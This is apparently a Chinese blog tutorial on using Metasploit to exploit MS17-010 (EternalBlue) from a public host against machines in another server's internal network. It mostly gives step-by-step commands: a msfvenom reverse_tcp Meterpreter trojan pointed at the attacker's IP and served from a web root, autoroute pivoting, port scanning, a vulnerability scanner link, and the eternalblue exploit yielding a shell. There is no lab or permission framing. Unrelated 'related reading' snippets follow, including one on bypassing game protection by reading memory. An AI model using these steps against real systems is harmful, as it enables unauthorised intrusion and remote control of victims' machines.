ms17010
前言
其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。
准备工作
2.一台其他服务器内网存在445漏洞
3.细心,细心,细心,钻研,钻研!!!
开始第一步:公网主机操作
生成msf木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe
Msf监听端口:6666
可以看到,图中获取到了shell!
添加路由
第一步:run get_local_subnets (获取当前路由)
第二步:run autoroute -s 192.168.3.0/24 (添加路由)
第三步:run autoroute -p (查看已添加路由)
使用Payload进行攻击
第一步:background(转换到后台)
第二步:use scanner/portscan/tcp (先扫描开放445端口的PC)
第三步:exploit(开始扫描)
.
注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)
如何列出那些存在445漏洞的PC?
MS_17_010_Scan.zip:https://bbs.ichunqiu.com/thread-40308-1-1.html
描述:
工具的使用步骤如下:
解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
-ip参数可以指定IP扫描,同时支持IP段扫描:
MS_17_010_Scan.exe -ip 192.168.44.129
MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
-file参数支持从文件读取IP列表进行扫描:
MS_17_010_Scan.exe -file ip.txt
工具将显示检测结果:如不存在风险将显示NOT Found Vuln,如存在风险将显示Found Vuln ms17-010及目标电脑的操作系统版本,如果IP地址无效或者漏洞端口未开则显示Exception。
输出结果同时保存在当前目录的result.txt中。
上面的工具也可以在webshell中使用,只需要把结果输出到 txt文档中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)
攻击正式开始
第一步:use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)
第二步:set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)
第三步:exploit(执行攻击)
第四步:攻击完成,并且自动返回一个shell控制台(如下图)
相关阅读
网站数据分析是通过观察、调查、实验、测量等结果,通过数据的显示形式把网站各方面情况反映出来,使运营者更加了解网站的运营情况
作为产品运营人员,我们都知道运营的最终目标是要和用户之间建立长期有价值的联系。完美的用户界面、强大的功能和明确的价值主张,对
【转】多因子策略探索(1)为什么要用聚宽以市场上知名的TB、文化等期货研究平台为代表,均采用了数据驱动的回测方式,不能按照复利回测(
利用DuplicateHandle()无驱动的另类读写内存方法,理论
突发奇想出的原创思路,在理论上经过完善应该可以做到过游戏保护无驱动读写内存 首先看一下MSDN对这个函数的定义 BOOL DuplicateH
什么是市场营销?我们要想真正地去理解市场营销,关键是要学会洞察4P和4C背后的逻辑、角色及它们之间的联系。相信大多数营销人都有以